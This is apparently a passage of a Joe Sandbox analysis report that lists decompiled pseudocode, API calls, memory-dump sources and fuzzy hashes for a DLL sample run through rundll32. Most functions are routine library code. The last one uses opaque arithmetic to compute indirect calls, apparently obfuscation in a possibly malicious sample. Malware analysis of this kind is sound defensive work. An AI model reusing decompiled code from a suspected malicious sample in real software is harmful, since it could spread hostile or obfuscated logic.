                                                                                                            							_t60 = CreateFileA(_a4, _a8, _t81,  &_v280, _t58, _t79, 0);
                                                                                                            							if(_t60 != 0xffffffff) {
                                                                                                            								 *(_t83 + 4) = _t60;
                                                                                                            								 *(_t83 + 8) = _t86;
                                                                                                            								_t43 = _t86;
                                                                                                            								L31:
                                                                                                            								return E100117AE(_t43, _v8);
                                                                                                            							} else {
                                                                                                            								_t87 = _a12;
                                                                                                            								if(_t87 != 0) {
                                                                                                            									 *((intOrPtr*)(_t87 + 0xc)) = GetLastError();
                                                                                                            									 *((intOrPtr*)(_t87 + 8)) = E10026E5B(_t61);
                                                                                                            									E10006AEC(_t87 + 0x10, _a4);
                                                                                                            								}
                                                                                                            								goto L30;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t53 == 0x30) {
                                                                                                            							_t81 = 2;
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						if(_t53 == 0x40) {
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}





















                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10025AA1
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 10025BB6
                                                                                                            • GetLastError.KERNEL32 ref: 10025BC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 4207171074-4125583295
                                                                                                            • Opcode ID: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction ID: b9e8efc14b2e37d74310b66cc6c275d2155126b32d67271340f07ea8c5c0b371
                                                                                                            • Opcode Fuzzy Hash: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction Fuzzy Hash: 2141E771A00615ABEB12CF25EC82BDE77E4EB04391F90C529E917CB1D0DB7AD981CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* __ebp;
                                                                                                            				int _t42;
                                                                                                            				void* _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				intOrPtr* _t74;
                                                                                                            				intOrPtr _t76;
                                                                                                            				void* _t77;
                                                                                                            
                                                                                                            				_t69 = __edx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t71 = _a4;
                                                                                                            				_v8 = __ecx;
                                                                                                            				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
                                                                                                            					L6:
                                                                                                            					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
                                                                                                            						_a16 = _a16 | 0x00000004;
                                                                                                            						if((_a17 & 0x00000050) != 0) {
                                                                                                            							_a16 = _a16 & 0xffff2fff | 0x00002000;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t74 = E100339A3(_v8, _a16);
                                                                                                            					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                                                            					if( *(_t74 + 0x34) == 0) {
                                                                                                            						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
                                                                                                            					}
                                                                                                            					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
                                                                                                            					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                                                            					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
                                                                                                            					if((_t42 & 0x10000000) == 0) {
                                                                                                            						L14:
                                                                                                            						return _t42;
                                                                                                            					} else {
                                                                                                            						E100203AD(_t74, 8);
                                                                                                            						L13:
                                                                                                            						_t42 = UpdateWindow( *(_t74 + 0x1c));
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t76 =  *((intOrPtr*)(_t71 + 0x88));
                                                                                                            				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
                                                                                                            					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                                                            					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10033BB6
                                                                                                              • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                                                            • GetWindowLongA.USER32 ref: 10033C57
                                                                                                            • UpdateWindow.USER32(?), ref: 10033C70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentUpdate
                                                                                                            • String ID: P
                                                                                                            • API String ID: 1906497633-3110715001
                                                                                                            • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                                                            • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10025CEC(void* __ecx, void* __eflags) {
                                                                                                            				intOrPtr* _t21;
                                                                                                            				void* _t25;
                                                                                                            				struct HINSTANCE__* _t26;
                                                                                                            				_Unknown_base(*)()* _t30;
                                                                                                            				void* _t39;
                                                                                                            				CHAR* _t40;
                                                                                                            				void* _t42;
                                                                                                            				signed int* _t43;
                                                                                                            				void* _t44;
                                                                                                            				void* _t46;
                                                                                                            
                                                                                                            				E10011BF0(0x1003acec, _t46);
                                                                                                            				_t43 =  *(_t46 + 0x10);
                                                                                                            				 *_t43 =  *_t43 & 0x00000000;
                                                                                                            				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
                                                                                                            				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                                                            				_t21 = E100243B2();
                                                                                                            				_t38 =  *_t21;
                                                                                                            				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
                                                                                                            				 *(_t46 - 4) = 1;
                                                                                                            				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
                                                                                                            				_t40 =  *(_t46 + 0x10);
                                                                                                            				if(_t25 != 0) {
                                                                                                            					_t26 = LoadLibraryA(_t40);
                                                                                                            					if(_t26 == 0) {
                                                                                                            						goto L1;
                                                                                                            					}
                                                                                                            					_t30 = GetProcAddress(_t26, "DllGetClassObject");
                                                                                                            					if(_t30 == 0) {
                                                                                                            						_t44 = 0x800401f9;
                                                                                                            					} else {
                                                                                                            						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
                                                                                                            					}
                                                                                                            					L6:
                                                                                                            					E100014B0(_t40 - 0x10, _t38);
                                                                                                            					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
                                                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                                                                                                            					return _t44;
                                                                                                            				}
                                                                                                            				L1:
                                                                                                            				_t44 = 0x80040154;
                                                                                                            				goto L6;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025CF1
                                                                                                              • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                              • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 821125782-1075368562
                                                                                                            • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                                                            • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v16;
                                                                                                            				char _v276;
                                                                                                            				intOrPtr _t10;
                                                                                                            				long _t12;
                                                                                                            				void* _t13;
                                                                                                            				CHAR* _t16;
                                                                                                            				void* _t30;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t10 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t10;
                                                                                                            				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
                                                                                                            				if(_t12 == 0 || _t12 == 0x104) {
                                                                                                            					L4:
                                                                                                            					_t13 = 0;
                                                                                                            				} else {
                                                                                                            					_push(__esi);
                                                                                                            					_push(__edi);
                                                                                                            					_t16 = PathFindExtensionA( &_v276);
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsw");
                                                                                                            					asm("movsb");
                                                                                                            					_pop(_t30);
                                                                                                            					_pop(_t33);
                                                                                                            					if(_t16 -  &_v276 + 7 > 0x104) {
                                                                                                            						goto L4;
                                                                                                            					} else {
                                                                                                            						lstrcpyA(_t16,  &_v16);
                                                                                                            						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t13, _v8);
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                                                              • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                                                            • String ID: %s.dll
                                                                                                            • API String ID: 4178508759-3668843792
                                                                                                            • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                                                            • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E100364C3() {
                                                                                                            				signed short _v16;
                                                                                                            				signed short _v20;
                                                                                                            				char _v24;
                                                                                                            				signed int _t6;
                                                                                                            				intOrPtr* _t16;
                                                                                                            				signed int _t19;
                                                                                                            
                                                                                                            				_t6 =  *0x1004b8c8; // 0xffffffff
                                                                                                            				if(_t6 != 0xffffffff) {
                                                                                                            					return _t6;
                                                                                                            				}
                                                                                                            				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                                                                                                            				_t19 = 0x40000;
                                                                                                            				if(_t16 != 0) {
                                                                                                            					E10011C50( &_v24, 0, 0x14);
                                                                                                            					_push( &_v24);
                                                                                                            					_v24 = 0x14;
                                                                                                            					if( *_t16() >= 0) {
                                                                                                            						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *0x1004b8c8 = _t19;
                                                                                                            				return _t19;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: COMCTL32.DLL$DllGetVersion
                                                                                                            • API String ID: 1646373207-1518460440
                                                                                                            • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                                                            • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr _t9;
                                                                                                            				signed int _t17;
                                                                                                            
                                                                                                            				_t9 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t9;
                                                                                                            				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                                                            					_t10 = 0;
                                                                                                            				} else {
                                                                                                            					GetClassNameA(_a4,  &_v20, 0xa);
                                                                                                            					_t17 = lstrcmpiA( &_v20, "combobox");
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t10 =  ~_t17 + 1;
                                                                                                            				}
                                                                                                            				return E100117AE(_t10, _v8);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                            • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLongNameWindowlstrcmpi
                                                                                                            • String ID: combobox
                                                                                                            • API String ID: 2054663530-2240613097
                                                                                                            • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                                                            • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10019599(void* __eflags) {
                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                            				void* _t13;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            				void* _t16;
                                                                                                            
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x10042d28);
                                                                                                            				E10012514(_t13, _t14, _t15);
                                                                                                            				_t9 =  *0x1004f820;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					if( *0x1004f3e0 == 1) {
                                                                                                            						L4:
                                                                                                            						_t9 = 0x10019589;
                                                                                                            						 *0x1004f820 = 0x10019589;
                                                                                                            					} else {
                                                                                                            						_t12 = GetModuleHandleA("kernel32.dll");
                                                                                                            						if(_t12 == 0) {
                                                                                                            							goto L4;
                                                                                                            						} else {
                                                                                                            							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
                                                                                                            							 *0x1004f820 = _t9;
                                                                                                            							if(_t9 == 0) {
                                                                                                            								goto L4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
                                                                                                            				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
                                                                                                            				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
                                                                                                            				return E1001254F(_t10);
                                                                                                            			}


                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                                                            Strings
                                                                                                            • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                                                            • kernel32.dll, xrefs: 100195B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                            • API String ID: 1646373207-3733552308
                                                                                                            • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                                                            • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10004DD0() {
                                                                                                            				void* _t51;
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t59;
                                                                                                            				signed int _t61;
                                                                                                            				intOrPtr _t82;
                                                                                                            				signed int _t96;
                                                                                                            				signed int _t103;
                                                                                                            				signed int _t111;
                                                                                                            				signed int _t112;
                                                                                                            				signed int _t120;
                                                                                                            				signed int _t121;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t132;
                                                                                                            				signed int _t139;
                                                                                                            				signed int _t142;
                                                                                                            				signed int _t151;
                                                                                                            				intOrPtr _t157;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t162;
                                                                                                            				signed int _t163;
                                                                                                            				void* _t164;
                                                                                                            				signed int _t166;
                                                                                                            				signed int _t173;
                                                                                                            				signed int _t177;
                                                                                                            				signed int _t189;
                                                                                                            				void* _t195;
                                                                                                            				void* _t196;
                                                                                                            
                                                                                                            				_t164 =  *(_t195 + 0xc);
                                                                                                            				if(_t164 != 0) {
                                                                                                            					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
                                                                                                            						_t132 =  *0x1004b0e0; // 0x0
                                                                                                            						_t103 =  *0x1004b0dc; // 0x0
                                                                                                            						_t151 =  *0x1004b0e8; // 0x0
                                                                                                            						_t162 =  *0x1004b0e4; // 0x0
                                                                                                            						_t82 =  *((intOrPtr*)(_t164 + 4));
                                                                                                            						_t163 =  *0x1004b0ec; // 0x0
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
                                                                                                            					}
                                                                                                            					_t111 =  *0x1004b0dc; // 0x0
                                                                                                            					_t53 =  *0x1004b0e8; // 0x0
                                                                                                            					_t166 =  *0x1004b0ec; // 0x0
                                                                                                            					_t10 = _t111 + 1; // 0x1
                                                                                                            					_t112 =  *0x1004b0e0; // 0x0
                                                                                                            					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
                                                                                                            					_t196 = _t195 + 4;
                                                                                                            					if( *((intOrPtr*)(_t164 + 8)) == 0) {
                                                                                                            						L9:
                                                                                                            						_t157 =  *((intOrPtr*)(_t164 + 4));
                                                                                                            						if(_t157 != 0) {
                                                                                                            							_t59 =  *0x1004b0dc; // 0x0
                                                                                                            							_t120 =  *0x1004b0ec; // 0x0
                                                                                                            							_t139 =  *0x1004b0e8; // 0x0
                                                                                                            							_t121 =  *0x1004b0e0; // 0x0
                                                                                                            							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
                                                                                                            						}
                                                                                                            						return HeapFree(GetProcessHeap(), 0, _t164);
                                                                                                            					} else {
                                                                                                            						_t125 =  *0x1004b0e0; // 0x0
                                                                                                            						_t159 =  *0x1004b0ec; // 0x0
                                                                                                            						_t173 =  *0x1004b0dc; // 0x0
                                                                                                            						_t142 =  *0x1004b0d8; // 0x0
                                                                                                            						_t61 =  *0x1004b0e4; // 0x0
                                                                                                            						_t12 = _t125 + 1; // 0x1
                                                                                                            						 *(_t196 + 0x18) = 0;
                                                                                                            						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
                                                                                                            							L8:
                                                                                                            							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
                                                                                                            							_t196 = _t196 + 4;
                                                                                                            							goto L9;
                                                                                                            						} else {
                                                                                                            							goto L5;
